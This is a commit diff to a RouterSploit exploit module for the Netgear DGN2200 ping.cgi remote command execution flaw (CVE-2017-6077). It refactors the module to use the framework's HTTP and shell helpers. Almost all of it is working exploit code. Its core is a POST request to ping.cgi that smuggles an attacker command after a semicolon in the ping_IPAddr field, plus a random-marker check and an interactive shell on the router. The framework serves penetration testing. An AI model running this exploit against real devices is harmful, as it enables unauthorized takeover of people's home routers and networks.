Used utils shell() and http_request()

routersploit/modules/exploits/netgear/dgn2200_ping_cgi_rce.py

-import requests
-
 from routersploit import (
     exploits,
     print_error,
@@ -7,6 +5,9 @@ from routersploit import (
     print_status,
     mute,
     validators,
+    http_request,
+    random_text,
+    shell,
 )
 
 
@@ -19,10 +20,11 @@ class Exploit(exploits.Exploit):
         'description': 'Exploits Netgear DGN2200 RCE vulnerability in the ping.cgi script',
         'authors': [
             'SivertPL',  # vulnerability discovery
-            'Josh Abraham',  # routesploit module
+            'Josh Abraham <sinisterpatrician[at]google.com>',  # routesploit module
         ],
         'references': [
             'https://www.exploit-db.com/exploits/41394/',
+            'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6077',
         ],
         'devices': [
             'Netgear DGN2200v1',
@@ -43,25 +45,18 @@ class Exploit(exploits.Exploit):
         if self.check():
             print_success("Target is vulnerable")
             print_status("Invoking command loop...")
-            self.command_loop()
+            shell(self, architecture="mips")
         else:
             print_error("Target is not vulnerable")
 
-    def command_loop(self):
-        while True:
-            command = raw_input("cmd > ")
-            if command in ['exit', 'quit']:
-                return
-            r = self.execute(command)
-            for l in r:
-                print l.encode('utf-8')
-
     def execute(self, command):
-        r = requests.post(self.target + "/ping.cgi",
-                          data={'IPAddr1': 12, 'IPAddr2': 12, 'IPAddr3': 12, 'IPAddr4': 12, 'ping': "Ping", 'ping_IPAddr': "12.12.12.12; " + command},
-                          auth=(self.login, self.password), headers={'referer': "http://192.168.0.1/DIAG_diag.htm"})
+        url = "{}/ping.cgi".format(self.target)
+        data = {'IPAddr1': 12, 'IPAddr2': 12, 'IPAddr3': 12, 'IPAddr4': 12, 'ping': "Ping", 'ping_IPAddr': "12.12.12.12; " + command}
+        referer = "{}/DIAG_diag.htm".format(self.target)
+        headers = {'referer': referer}
+        r = http_request(method="POST", url=url, data=data, auth=(self.login, self.password), headers=headers)
         result = self.parse_output(r.text)
-        return result
+        return result.encode('utf-8')
 
     def parse_output(self, text):
         yet = False
@@ -74,12 +69,17 @@ class Exploit(exploits.Exploit):
                 if line.startswith("</textarea>"):
                     break
                 result.append(line)
-        return result
+        return "\n".join(result)
 
     @mute
     def check(self):
         """
-        Method that verifies if the target is vulnerable. It should not write anything on stdout and stderr.
+        Method that verifies if the target is vulnerable.
         """
-        r = self.execute("echo test123")
-        return any("test123" in s for s in r)
+        rand_marker = random_text(6)
+        command = "echo {}".format(rand_marker)
+
+        if rand_marker in self.execute(command):
+            return True
+
+        return False